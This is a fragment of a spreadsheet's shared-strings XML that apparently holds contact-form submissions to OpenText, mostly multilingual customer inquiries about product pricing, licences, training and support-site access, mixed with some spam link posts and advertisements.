  </si>
  <si>
    <t>Question on update of software.  Hi, we currently are using a very old version of Exceed for Windows (v6.0).  We use just a small part of what it has to offer I am interested in what can be done to update to the latest version.  The main package that we use is the Hummingbird Xwindow and FTP programs._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Scott</t>
  </si>
  <si>
    <t>Looking for a product demo of your OpenText Capture Center.</t>
  </si>
  <si>
    <t>Need access to the knowledge base and support site</t>
  </si>
  <si>
    <t>I tried logging in and received the registration confirmation email.  Then clicked on my support.  Received the need confirmation email again.  So I did it again and the whole thing started over again.  I will try one more time to log in and see if it will let me now or not.</t>
  </si>
  <si>
    <t>Hello,_x000D_
  I am working on a Streamserve project and I need some online support if possible, because I am new to it and am experiencing some difficulties accomplishing my task. Could I get some online support from OpenText?_x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Opentext,_x000D_
_x000D_
I would like to know how to open support tickets on my account with you. I have requested site access successfully but cannot find the option to open a ticket. _x000D_
_x000D_
Please let me know at your earliest convenience._x000D_
_x000D_
Kind Regards,_x000D_
Henal Ganatra_x000D_
ICT Support &amp; Training Officer </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in obtaining recent verified email database of Procore Software Users &amp; Construction Management Software Users?_x000D_
_x000D_
This list Contains Company name, Web address, Contact name, Phone number, Email address, Title, physical address, City, State, Zip Code, Country, Phone number, Fax Number, Employee size._x000D_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</si>
  <si>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I'm looking to take the courses '2-0117 WebReports Design I v10.5 SP1' &amp; '2-0118 WebReports Design II v10.5 SP1' at Ottawa._x000D_
When will be the next courses ?</t>
  </si>
  <si>
    <t>I have questions about how to purchase the RedactIt software, please contact me asap._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Hi Folks,_x000D_
I need to install and setup an Opentext eDocs DM server but i can only find the installation guide, there is no information about where to get the installer setup file for the same kindly support me for the same._x000D_
I hava a license to carry out the installation but couldnt find the msi installer._x000D_
Thanks in advance,_x000D_
Regards,_x000D_
Rajesh K</t>
  </si>
  <si>
    <t>Hello, I signed up for the VIM bootcamp starting 11-13 and have not heard from Open Text.  I was wondering if this class was still scheduled and when I would receive the payment request?</t>
  </si>
  <si>
    <t>I need to include it in a CMS proposal for one of our customers</t>
  </si>
  <si>
    <t xml:space="preserve">We will be buying a Rightfax System for a project in Omán and I need to know who is your organisation office or partner or distribuitor in this country to make the request for purchasing. Thank you  </t>
  </si>
  <si>
    <t xml:space="preserve">Inquiry about Opentext and if there is a integration with Oracle PeopleSoft ERPs. I can only see SAP, Oracle EBS and Microsoft product integrations on your website. </t>
  </si>
  <si>
    <t xml:space="preserve">Am interested in talking to someone regarding your ECM solution. </t>
  </si>
  <si>
    <t>Bom dia,_x000D_
A Opentext oferece algum treinamento da ferramenta Case360 no Brasil?_x000D_
Caso afirmativo, gostaria de maiores informações, como custo, disponibilidade e local do treinamento._x000D_
Obrigado.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear All,_x000D_
This is Saleh Almahmoud from NHC Saudi Arabia, we would like to have DMS. Appreciated to share with me the contact information of the responsible for this domain  in Saudi Arabia._x000D_
</t>
  </si>
  <si>
    <t>Hello, We want an offer for support for one of our costumers: Unicredit Bank Romania. Thanks</t>
  </si>
  <si>
    <t>I need an contact email adress please. As a Service Provider we supporting a transfer of business. I would send u an Email with more informations and attachments if i got an email adress._x000D_
_x000D_
Kind Regards_x000D_
Christian Ehnert</t>
  </si>
  <si>
    <t>Hi We have alchemy Search, Release 7.6 can we get a multi user license for this ?_x000D_
thank you John</t>
  </si>
  <si>
    <t>I search for a security documentation for OpenText Archive Services, like a security Whitepaper / Security Notes or Security Guide. Do you have something like this? I used to search in the knowledge base, but had no success in finding something. I prefer answer via email if possible , thank you in advance. Kind regards, Anna Willnow</t>
  </si>
  <si>
    <t>how to Leverage the existing BPM to use Cloud capabilities</t>
  </si>
  <si>
    <t>We need to train 10 people from our team on Exstream16.2  in Bangalore. Please help us with the details.</t>
  </si>
  <si>
    <t>Hi, I have tried the number on your website for your offices in Cork, Ireland and it is just ringing out. If possible, could you please pass on my details to Caroline Holohan in HR and ask her to drop me an email. Thank you.</t>
  </si>
  <si>
    <t>xPression 4.6  upgrade installer download  . Currently we have xPression 4.5 SP1 patch 8 version, and we want to upgrade to xPression 4.6. Need the upgrade / downloader URL</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
 _x000D_
wir sind ein Software-Distributor mit Sitz in Unterhaching. Einer unserer Kunden hat Interesse an _x000D_
_x000D_
OpenText/GUPTA License Support Softwarewartung_x000D_
Laufzeit:           01.01.2018-31.12.2018, _x000D_
Lizenznr:          10632188, 10632190, 10632221, 10665520, 10710715, 30001800, 30001801._x000D_
Menge:            7 Stück_x000D_
 _x000D_
Kunde:_x000D_
Kassenzahnärztliche Vereinigung Nordrhein_x000D_
Lindemannstr. 34 - 42_x000D_
40237 Düsseldorf_x000D_
_x000D_
Bitte senden Sie mir ein Angebot mit folgenden Informationen (falls erhältlich) zu:_x000D_
•	Listpreis netto_x000D_
•	Händlerpreis netto_x000D_
•	Artikelbezeichnung_x000D_
•	Art der Lieferung – Datenträger oder Download/ESD_x000D_
•	Herstellernummer_x000D_
•	Verfügbare Sprache_x000D_
•	Versandkosten_x000D_
•	Zahlungsbedingungen_x000D_
•	Wartungskosten pro Jahr. Wartung Optional/Verpflichtend?_x000D_
•	Sonstige Informationen die für den Bestellprozess relevant wären_x000D_
 _x000D_
Falls Sie noch Fragen haben, stehe ich Ihnen gerne zur Verfügung._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
I have no acess to my support page so I can download and see my tickets._x000D_
Can you check if my support contract is active or there is an other issue ?  _x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
On your website under download section for The FirstClass 16.103 Client for Mac there are no official informations about High Sierra 10.13 support for the Client. Is it because you still have problems with your FirstClass 16.103 version with High Sierra or is it something else?_x000D_
Best regards_x000D_
Jasmin Buljubasic, Copenhagen_x000D_
</t>
  </si>
  <si>
    <t>It appears that my access was not ported across in terms of your acquisition of the Dell/EMC software products, viz. Documentum, Captiva, and xPression. Please address this.</t>
  </si>
  <si>
    <t>For the opening in Sales</t>
  </si>
  <si>
    <t>We’re looking for a survey scanning software program that will work with our existing Ricoh Aficio MP C5501high-speed copier/scanner.  We’d need to be able to scan multi-page surveys that are already formatted (meaning, not created in TeleForm) and we may receive up to 10,000 surveys.  Data will be exported into SPSS.  For other projects, we may create the survey in TeleForm, but it has to be very user-friendly and easy to use.  We have an older version of Teleform Elite 8 which we purchased form Cardiff Software back in 2004.  We’d like costs for an upgrade if we are eligible or pricing for the current version of the software, please.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I need to add an additional user, for technical support access._x000D_
Can you please advise how to do this?</t>
  </si>
  <si>
    <t>We have been using Imagenation View and Imagenation Edit for many years. These applications continue to satisfy our business requirements however, as we are moving to Windows 10, we are finding that these applications are performing very slowly. Can you recommend a new product/s which can provide a View and Edit capability. We use Imagenation View for displaying CLF, EDT, PLT/HPGL, TIFF, PDF, GP4, etc. We use Imagenation Edit to create CLF and EDT layers and include Hotspots._x000D_
_x000D_
We currently have a maintenance agreement with you and hold just over 100 licences.</t>
  </si>
  <si>
    <t>Ученые из США проанализировали данные 46034 исследований, в которых применялись методы визуализации мозга. У женщин активность мозга оказалась выше, чем у мужчин. Подробнее читайте на сайте [url=http://domoxozyaiki.ru]domoxozyaiki.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
I’m with FITECH, a consulting/IT firm primarily serving the Real Estate industry, and we are currently working with the folks at Treeline Companies. FITECH has identified your solution as a potential fit to meet Treeline’s Document Management Solution requirements. Treeline is considering several other Document Management Solutions, so my goal is to ensure that all platforms have equal access to understanding Treeline’s requirements, allowing each solution to shine and provide Treeline a fair system selection.  _x000D_
_x000D_
Before we get a demo setup, I’d love to spend a few minutes chatting with you and any members of your team to relay these requirements and better understand your solution. _x000D_
_x000D_
Do you have any time this week to connect? _x000D_
_x000D_
Best,_x000D_
Max_x000D_
</t>
  </si>
  <si>
    <t>Not sure who our account representative is anymore. I would like to discuss the AGA product and how it works with Office365.</t>
  </si>
  <si>
    <t>Information in regards to ApplicationXtender.</t>
  </si>
  <si>
    <t>content management</t>
  </si>
  <si>
    <t xml:space="preserve">2nd request - Please send link to Open Text, User name and password so we can view Boscovs' PO's for Revman Internationl. Thanks </t>
  </si>
  <si>
    <t>I am currently investigating Fax alternative solutions.  Pharmacare currently Faxes inbound/outbound 65,000 pages per month.  Which Rightfax solution would you recommend to handle this volume.  Anticipate 30% volume growth rate per year.   Please provide an appliance option solution if available.  And cost for the Cloud alternative.  Also, if possible, RightFax with PRI\Analog lines interfaced directly into it. _x000D_
Please correspond via email at this time....</t>
  </si>
  <si>
    <t>Currently doing consulting for one client that owns RightFax and we're interested in exploring the capabilities of the OpenText RightFax Searchable PDF Module. We'd like a brochure and/or demo on product capabilities and list pricing. Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Systronics </t>
  </si>
  <si>
    <t>When we try to access support, we get the below message.  However, we've gone through the steps to confirm our email several times.  Let us know how to proceed. _x000D_
 _x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us.</t>
  </si>
  <si>
    <t>Purchase a single Provision license for DoDAF</t>
  </si>
  <si>
    <t>Byebyeblue</t>
  </si>
  <si>
    <t>Log in not working! Help!!!</t>
  </si>
  <si>
    <t>Careers_x000D_
To: Human Resources_x000D_
University Schooled_x000D_
English Fluent are in Phillipine_x000D_
_x000D_
IBM Maximo 21  Years – SAP Financial/Maintenance  in Years_x000D_
_x000D_
20 Accountings US Dollars_x000D_
30 Programmers US Dollars_x000D_
35 Financials US Dollars_x000D_
35 Legals US Dollars_x000D_
Vacation, nope; Sick nope; EEO nope._x000D_
American Phillipines Richard Taggs – President</t>
  </si>
  <si>
    <t>Interest in Right Fax as a 'desktop' faxing solution.</t>
  </si>
  <si>
    <t>To: Human Resources_x000D_
University Schooled_x000D_
English Fluent are in Phillipine_x000D_
_x000D_
IBM Maximo 21  Years – SAP Financial/Maintenance  in Years_x000D_
_x000D_
20 Accountings US Dollars_x000D_
30 Programmers US Dollars_x000D_
35 Financials US Dollars_x000D_
35 Legals US Dollars_x000D_
Vacation, nope; Sick nope; EEO nope._x000D_
American Phillipines Richard Taggs – President</t>
  </si>
  <si>
    <t>Hi, hope you are doing greate. _x000D_
_x000D_
I contact you becausse we have a cliente that its looking ofr a ECM solution and we are the IT advisor of this cliente. _x000D_
_x000D_
We are looking to work with you, how can i contact you in Mexico? _x000D_
_x000D_
Best Regards</t>
  </si>
  <si>
    <t>Looking for a fax solution._x000D_
The solution must:_x000D_
have no physical faxing gateways / devices that have to be installed on our network_x000D_
provide a local-to-the end-user fax numbers (e.g. Dan: 804-123-4567)_x000D_
have a / work with per-user configuration / provisioning for privacy and accountability_x000D_
desktop install able client software is OK, but it should be evaluated for ease of use_x000D_
less than 5 users</t>
  </si>
  <si>
    <t>I want to know the plans for small business, can you help me?</t>
  </si>
  <si>
    <t>I am registered user and I am having issues with my account does not have access to this resource while I am trying to the get the support through online.</t>
  </si>
  <si>
    <t>We have Exceed 14, but it doesn't appear to work with Windows 10. I am interested in purchasing the newest version. I will need 4 copies to start with.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I was wondering if you were able to provide a quote for 'Documentum ApplicationXtender 7' and 'My Documentum for Desktop 6.7 or the closest available products. I was advised to contact you by an chat assistant at Dell EMC_x000D_
_x000D_
Thanks,_x000D_
Dilan </t>
  </si>
  <si>
    <t>Electronic Quality Management System/Document Management System</t>
  </si>
  <si>
    <t>Need to know the market version of OpenText</t>
  </si>
  <si>
    <t xml:space="preserve">I need to confirm access to OpenText support for LiquidOffice.  I previously had access to the KB an download area but it is no longer accessible.  Can you check and re-enable access if possible.  Thank you  </t>
  </si>
  <si>
    <t>Looking to get pricing on OpenText Document Management eDOCS Edition. If possible, please email me details. Thank you!</t>
  </si>
  <si>
    <t>Bonjour_x000D_
_x000D_
Nous souhaitons mettre en place une solution électronique de gestion documentaire, pouvez vous me fournir de la documentation autour de votre solution ?_x000D_
_x000D_
Cordialement_x000D_
_x000D_
Sulian Lanteri</t>
  </si>
  <si>
    <t>need e-mail address to submit RFP and Vendor Survey EDI Software attachments, for Open Text response.</t>
  </si>
  <si>
    <t>We are working with TD 6.2 and would like to use the knowledge part, a creation of login is not possible (doesn´t work) and the old Gupta login doesn´t work either. Would love to hear soon to solve a problem. _x000D_
_x000D_
Best,_x000D_
Henrik Schreiber</t>
  </si>
  <si>
    <t>Require Calendar View Report, Steps for building the report similar to below_x000D_
https://blogs.opentext.com/creating-a-birt-report-as-a-calendar-view/_x000D_
Please help me for the same.</t>
  </si>
  <si>
    <t>Good morning.  We have employees that often attend training at your location in Ottawa. Prices vary from one employee to the other in their request. I've notices lately that some of them put $750 per day, as per Government of Canada special rate. Does this apply to every courses? Is this written somewhere on your web site? _x000D_
Please reply by e-mail._x000D_
Thanks</t>
  </si>
  <si>
    <t>Реши открыть сайт, но никак не могу выбрать лучшие партнёрские программы для монетизации. У кго-нибудь есть опыт? _x000D_
[url=https://partner-progs.ru/progs.png][img]https://partner-progs.ru/progs.png[/img][/url]</t>
  </si>
  <si>
    <t>I am looking at potential solutions in the areas of customer experience management, business process management, workflow, backoffice efficiency. The context is around the claims function of Covea Insurance UK, which is a major part of the business. I am interested to see what you could offer in these areas and potentially see a demo of your products.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Je réalise actuellement différentes démos avec des éditeurs de solutions GED ceci afin de faire une présélection et préparer mon futur appel d'offres GED. _x000D_
Merci de me proposer des dates._x000D_
_x000D_
Cordialement,_x000D_
Julien_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Need to buy OpenText content management for SAP S/4 HANA </t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je cherche actuellement à réaliser différents rdv avec des éditeurs ceci afin de faire quelques démos de solutions GED. _x000D_
L'idée sera de construire un appel d'offres suite à cette pré-sélection._x000D_
Merci de me proposer des dates._x000D_
_x000D_
Cordialement,_x000D_
Julien</t>
  </si>
  <si>
    <t>Hello, I would like some more information on the product OpenText Fax2Mail._x000D_
Do you encrypt the faxs?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hej,_x000D_
Jag är projektledare på Husqvarna AB och vi är precis i början av titta på olika alternativ för att byta ut vårt DAM system._x000D_
Jag söker en kontaktperson hos er som vi kan skicka vår offertförfrågan tillsammans med de krav vi har för att se om ni är rätt leverantör för oss._x000D_
_x000D_
Tack på förhand!_x000D_
_x000D_
Med vänlig hälsning_x000D_
Maria Holgrsson</t>
  </si>
  <si>
    <t>Want to become a reseller</t>
  </si>
  <si>
    <t>Ich bitte um Kontakt für Folgendes Projekt:_x000D_
Mittels Elektronikbanking abgerufenen und in einem Laufwerk abgelegte Bankkontoauszüge (PDF-Dokumente in ZIP-File) sind im IXOS-Archiv abzulegen._x000D_
Anzeige soll über die Dokulink-Schnittstelle erfolgen</t>
  </si>
  <si>
    <t xml:space="preserve">LiveLink inquire </t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Nous utilisons déjà SAP et OpenText, comment pouvez-vous nous aider à développer nos EDI avec nos différents partenaires (transporteurs, fournisseurs, clients)?_x000D_
Merci de votre retour,_x000D_
Vincent VIROT</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team,_x000D_
_x000D_
My name is Dhrumil Kothari, working at Capital Novus. i have requirements to create reports by end user of my site, they can create reports from my website, can save it and can view the same with latest data from my site._x000D_
_x000D_
For this i go through your site and find that its possible using your system. _x000D_
_x000D_
my requirements are as follows._x000D_
_x000D_
1. On Premise solution (data will be saved on my server)._x000D_
_x000D_
2.Embedded Reports (End-user will logged into my system, and create/edit/update Reports/dashboards)._x000D_
 -end user will not going to use/install your system._x000D_
- host report in my premises and browser base editing should be supported_x000D_
_x000D_
_x000D_
so if you can fulfill my requirements, then just let me know further procedure/your requirements . _x000D_
</t>
  </si>
  <si>
    <t>I am trying to generate the calendar view report as per below link  but the steps are not much clear some were few points are missing, So can i get calendar view rpt.design or can you let me know the steps how to generate it , we would be gladfull Bosch Project need this Report._x000D_
_x000D_
https://blogs.opentext.com/creating-a-birt-report-as-a-calendar-view/</t>
  </si>
  <si>
    <t xml:space="preserve">Good day! I would like to send a proposal to offer you the services of our company. We provide General services, IT Personnel outsourcing/bodyshops, and also manage service. May I know the business unit or person in charge that  I may directly coordinate regarding this so I may also send our company profile. If you are interested kindly email me at hastorga@wesupportinc.com. Thank you. </t>
  </si>
  <si>
    <t>Need an update for my Brava reader.</t>
  </si>
  <si>
    <t>Кольца со вставками из драгоценных и полудрагоценных камней выглядят стильно и солидно. Не удивительно, что многие девушки мечтают, чтобы в день свадьбы жених одел им на пальчик колечко со сверкающими камнями. Читайте об этом подробнее на сайте [url=http://womanmaniya.ru]womanmaniya.ru[/url]</t>
  </si>
  <si>
    <t>Used Myriad for years! Brava does not seem to have ability to use tabs rather than opening a new window.  Without tabs it is near impossible to view numerous documents for reference, discussion, etc.</t>
  </si>
  <si>
    <t xml:space="preserve">to begin learning_x000D_
 </t>
  </si>
  <si>
    <t xml:space="preserve"> By spaying or neutering your pet, youвЂ™ll help control the pet homelessness crisis, which results in millions of healthy dogs and cats being euthanized in the United Neutering Your Male Dog вЂ“ Pros and Cons . Most cat owners use traditional clay based cat litters because they are so easy &amp; convenient. Unfortunately, these litters are not very kind to our planet or the Friendly Cat Litter : Product Reviews - Felinexpress.  _x000D_
 [url=http://pagebin.com/4jzTOtOn]Cat litter mat whichita falls[/url] [url=http://pagebin.com/bnEZQvie]cat cystitis treatment round rock[/url]  _x000D_
 Automaticcatlitterboxes come in several different styles. Here are thebestautomaticcatlitterboxes for you and your feline a NewLitterBoxfor aCator a Kitten - Petco Your browser indicates if youve visited tihs linjk. Sentry В®ClamingDiffuserforCats . Cart (0) SerestoВ® SheaPet ... This provenpheromonetechnology is perfect forcalmingpets in a specific - Your browser indicates if youve visited this link.  _x000D_
what cleans cat urine sacramento _x000D_
 _x000D_
 Foundatoin- Bengal -Information- Bengal -Filial-Inf-oF1-F2- F3 -F4 ... Your browser indicates if youve visited this link The origin of theBengalbreed began with the cross between The Asian LeopardCat(ALC) and the domesticcat . Some of the early felines used in these matings include ... More results. Legendary Glittered SnowBengalKittenavailable now. JungleLureBengalsof Florida. We guarantee ourkittenshave incredible personalities &amp; looks!.  _x000D_
  [url=http://82cantheifiro82.soup.io/]Spray painting at home[/url] [url=http://bowbeaufantgist1978.soup.io/]Feline health issues[/url]  _x000D_
 CatColors- Fancers Your browser indicates if youve visited this link A. COMMONCATCOLORSThis sectoon is primarily intended to answer the question, "Whatcoloris mycat ?" It also explains basiccolorterminology and gives some ... More results. Getting yourcatnuetered is an important part of being a pet owner and there are many health benefits ofneuteringacat . Visit us today for further Ol</t>
  </si>
  <si>
    <t>We contacted opentext regarding an issue where mail was not getting opened and archived._x000D_
Aaron from opentext support team helped us out in that._x000D_
Need to contact Aaron to provide the RCA for this._x000D_
Thanks</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
My name is Eliseu Kaleniuk and I work at Targetware Informatica, a Brazilian reseller company. We have an open opportunity in our system, could you please help me with the quote?_x000D_
_x000D_
Product: OpenText Gupta Team Developer_x000D_
Quantity: 5_x000D_
License: Commercial_x000D_
Platform: Windows_x000D_
_x000D_
If you need more information, please, do not hesitate to contact me._x000D_
_x000D_
Kind Regards,_x000D_
Eliseu Kaleniuk</t>
  </si>
  <si>
    <t>Hello,_x000D_
My department at the BCCDC is interested in getting RightFaxc to replace our paper-based fax system. Any information on how to go about doing this would be appreciated!_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Eusebio Morales is no longer with the company. I need to get access to the support web site for myself and the other analysts. We will need to be able to download upgrades and open tickets.</t>
  </si>
  <si>
    <t>Need pricing on Right Fax Connector</t>
  </si>
  <si>
    <t>Interested in using Fax2Mail</t>
  </si>
  <si>
    <t xml:space="preserve">Could you provide pricing for Qty 10 - Exceed (64bit) license. </t>
  </si>
  <si>
    <t>We met with our sister company News Australia and they use your digital asset management system and we would like more information about it. We are thinking about which DAM to use going forward.</t>
  </si>
  <si>
    <t>Если вы владеете собственным делом, в конечном итоге поймёт, что без посадочной страницы у вас не получится работать дальше. Сейчас каждая компания, которая подумывают о своем будущем расширение, должны иметь веб-сайт. _x000D_
 _x000D_
Лендинг - средство, с помощью которого вы можете получать новых потенцмальных клиентов, получать проценты, чтобы сообщить о существовании вашей компании, ее продуктах. _x000D_
 _x000D_
Мы предлагает разработку пейджа. Мы можем создать для вас инструмент, с помощью которого вы сможете привлекать новых покупателей, получать доход и расти. Веб сервис- лицо производственной компании, по этой причине важно, кому вы доверяете формирование  своего порталы. Мы - команда профессионалов, которые имеют    большой  практический опыт    производства электронную коммерцию с нуля, дизайна, фирменного  дизайна. Мы всегда действуем над итогом. И мы предоставляем нашим заказчикам добротное   обслуживание по разумной цене от https://apistudio.ru. _x000D_
 _x000D_
У вас есть возможность заказать онлайн-визитку, веб портала. Вы можете быть уверены, что ваш целевая страница будет разработан на высоком уровне, со всеми современными методиками. _x000D_
 _x000D_
[url=https://apistudio.ru/]сервис рекламы[/url]</t>
  </si>
  <si>
    <t>Will you be offering this class again in the near future?  _x000D_
2250 RightFax Fundamentals - Course</t>
  </si>
  <si>
    <t xml:space="preserve">                                                                   Sté. SOCECS_x000D_
_x000D_
                                                                                                                               Sfax (Tunisie)_x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
                     A l’aimable attention de Monsieur/Madame le responsable_x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
Objet : Demande de collaboration et de représentation de vos produits « BIG DATA »_x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
            Monsieur, Madame_x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
Nous venons par la présente demander votre haute bienveillance de bien vouloir étudier la possibilité de collaboration de partenariat ensemble ainsi que de représentation de vos produits « BIG DATA » sur le marché Tunisien._x000D_
_x000D_
 _x000D_
_x000D_
Je vous informe que nous sommes, Mme et Mr. KHRIFECH, responsables de la Société Oméga de Conseils, d’Etudes, de Consulting, et de Services (SOCECS), une société nouvellement créée et spécialisée dans le domaine de conseils, de consulting et de services en BIG DATA en Tunisie, un domaine en vogue et à l’étape embryonnaire qui pourrait apporter de profondes transformations dans la manière de créer, de transmettre, de stocker, et d’utiliser les données._x000D_
_x000D_
 _x000D_
_x000D_
            Notre mission consiste à introduire le domaine de BIG DATA dans les organisations et les entreprises Tunisiennes, en commençant par l’étude, le conseil, et le consulting pour aboutir à proposer des solutions informatiques convenables et adaptables au contexte de ces BIG DATA, c’est-à-dire les solutions les plus adaptées à la collecte, au stockage, et à l’analyse de ces données. Votre contribution sur ce domaine nous a attiré et nous a intéressé pour une éventuelle collaboration de partenariat et de représentation de vos solutions sur le marché Tunisien en vue de pouvoir s’imposer devant les concurrents._x000D_
_x000D_
 _x000D_
_x000D_
            Nous restons à votre entière disposition pour toutes informations complémentaires et dans l’attente d’une réponse favorable, veuillez agréer, Mr le responsable, l’expression de nos profonds respec</t>
  </si>
  <si>
    <t>We would like more information on your taxonomy classification product to see if it would be a fit for our current taxonomy project.</t>
  </si>
  <si>
    <t>I have issues trying to get images open with Brava Reader (free) - I have uninstalled and reinstalled the software and yet, unable to open the files - an error message related to License._x000D_
Please advise, thanks._x000D_
Leonardo</t>
  </si>
  <si>
    <t>We are in the process of tagging OpenText Exceed Ver 13 so we know the export control information of the application.  Do you currently have the ECCN for the OpenText Exceed application? (https://www.bis.doc.gov/index.php/licensing/commerce-control-list-classification/export-control-classification-number-eccn)</t>
  </si>
  <si>
    <t xml:space="preserve">Please send Open Text link, user name and password so that we can advise status of orders. Thanks </t>
  </si>
  <si>
    <t>Hello, _x000D_
We couldn't KM center in this portal. Why we couldn't access?_x000D_
Greetings,_x000D_
Emine</t>
  </si>
  <si>
    <t>Hello! our customer in Czech is interested in purchasing the following product: -	Captiva Advanced Recognition Volume +100K PPY=PA. can you help us with pricing?</t>
  </si>
  <si>
    <t>Please remove our fax number from your services.  _x000D_
919-554-0305_x000D_
Thank you</t>
  </si>
  <si>
    <t>I´m not able to open Support Tickets in https://knowledge.opentext.com._x000D_
My account came from EMC Support and my site id was 4284243 (FURNAS CENTRAIS ELETRICAS)._x000D_
When i try to open, the page redirect to another that says :" No Access. We're sorry, your account does not grant you access to this resource." even i confirmed my email address._x000D_
Thank you.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Could you please send me the quotation ASAP for _x000D_
-	Captiva Adv Rcg Volume +100K PPY=PA_x000D_
o	3 packages _x000D_
o	1 year maintenance_x000D_
o	Time for delivery_x000D_
 _x000D_
the end user is SOCIETE GENERALE in Bulgaria_x000D_
Please indicate on the quotation :_x000D_
-	Public Price and  the reseller discount_x000D_
-	The period of coverage_x000D_
-	The part number and description of the product_x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Invitation to Tender_x000D_
 _x000D_
QF/2017/PD-SC/ 25391_x000D_
Provision for IT Governance, Risk and Compliance (GRC) _x000D_
Tools and Licensing for Three (3) Years_x000D_
 _x000D_
 _x000D_
Qatar Foundation is pleased to advise you that based on experience, your company is invited to provide _x000D_
a competitive offer for the above captioned tender. Documents are available for collection at the following _x000D_
address:_x000D_
 _x000D_
Mr. Abdul Hack_x000D_
Limited Tender Committee_x000D_
Qatar Foundation, Building No. 2  _x000D_
 _x000D_
At the time of collection your company representative must submit copy of identity card, a letter of authorization _x000D_
permitting him to collect the tender documents and provide a copy of an appropriate Commercial Registration _x000D_
for your company._x000D_
 _x000D_
Collect Documents: _x000D_
Documents can be collected (without tender fees), only during the working days of Qatar Foundation which _x000D_
are Sunday-Thursdays at the followings dates &amp; times:_x000D_
 _x000D_
•	Date                               :  From 19th October 2017 until  25th October 2017_x000D_
•	Daily Collection Time    :  09:00 am until 2:00 pm_x000D_
 _x000D_
 _x000D_
Bid Closing Date         15 November 2017 at 2:00 PM, Doha Time_x000D_
 _x000D_
 _x000D_
For Companies Based Outside Qatar_x000D_
Electronic copy of the tender documents will be issued (without tender fees),  via email to invited _x000D_
companies upon submission of thefollowing documents ;_x000D_
 _x000D_
a)    Expression of Interest  -  Must be signed by the authorized company signatory and stamped with company seal_x000D_
b)    Company Commercial Registration Documents and/or valid trade documents_x000D_
c)     Identity Card Copy of the Authorized Company Representative for this tender._x000D_
d)    Tax Card  and / or  other related company documents_x000D_
 _x000D_
 _x000D_
ITT Acknowledgement_x000D_
Kindly acknowledge receipt of this communication and confirm your interest to participate  via return _x000D_
email to  cmarinas@qf.org.qa_x000D_
 _x000D_
 _x000D_
Tender Communications_x000D_
To ensure the timely and effective flow of the communication, kindly provide the below information  via return _x000D_
email to  cmarinas@qf.org.qa_x000D_
 _x000D_
 _x000D_
COMPANY FOCAL </t>
  </si>
  <si>
    <t>May I gently ask if you have open post for Payroll Supervisor I am Certified Payroll Professional passer and advance excel user. hopefully you can call me or email me thank you</t>
  </si>
  <si>
    <t>The HKMC have purchased some RightFax licenses for its own these years, _x000D_
is the HKMC entitles to share or distribute those licenses across its subsidiaries?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello._x000D_
_x000D_
We are interested in training for next courses: 4-0140 4-0175 2-0113 4-0141._x000D_
In which way can we order training?_x000D_
I don't understand clearly about training on-demand._x000D_
Can you, please, propose us more convenient approach for learning in current circumstanses? On-line or on-site? Can you provide courses, for instance, in Kiev?_x000D_
And, unfortunatelly, we haven't excellent English._x000D_
_x000D_
Best regards,_x000D_
Igor Garanichev_x000D_
</t>
  </si>
  <si>
    <t>merhaba sipariş verdim ödeme yaptım lisas veya programı nerden indirebilirim.</t>
  </si>
  <si>
    <t>bonjour,_x000D_
Je voudrai avoir le prix de la licence pout OpenText Analitycs et IHUB._x000D_
pour l'élaboration des tableaux de bord d'un projet BI._x000D_
Merci d'avance.</t>
  </si>
  <si>
    <t>◇◆◇◆◇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
　　　　　人材不足解消　　　　　人材コスト削減_x000D_
──────────────────────────────────────────────_x000D_
☆パート人材はまだまだ豊富な市場！_x000D_
・働き方改革により主婦層の活用が注目されています。_x000D_
☆業務を見直せば効率の良い時間だけ配属！_x000D_
・1日8時間、週5日じゃないとダメでしょうか？_x000D_
☆１人分の業務をワークシェアで稼動させれば、お休みや退職時のリスクを軽減できます。_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━◇◆◇◆◇_x000D_
_x000D_
突然のメール失礼致します。_x000D_
このたびは貴社のホームページを拝見してご連絡させて頂きました。_x000D_
株式会社キャリアシステムと申します。_x000D_
_x000D_
弊社は、東京・名古屋・大阪で、パートタイム型／ワークシェア型派遣に特化した人材派遣会社です。_x000D_
_x000D_
＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿_x000D_
◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇_x000D_
￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣_x000D_
今回のご案内は「経理」人材です！_x000D_
＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿_x000D_
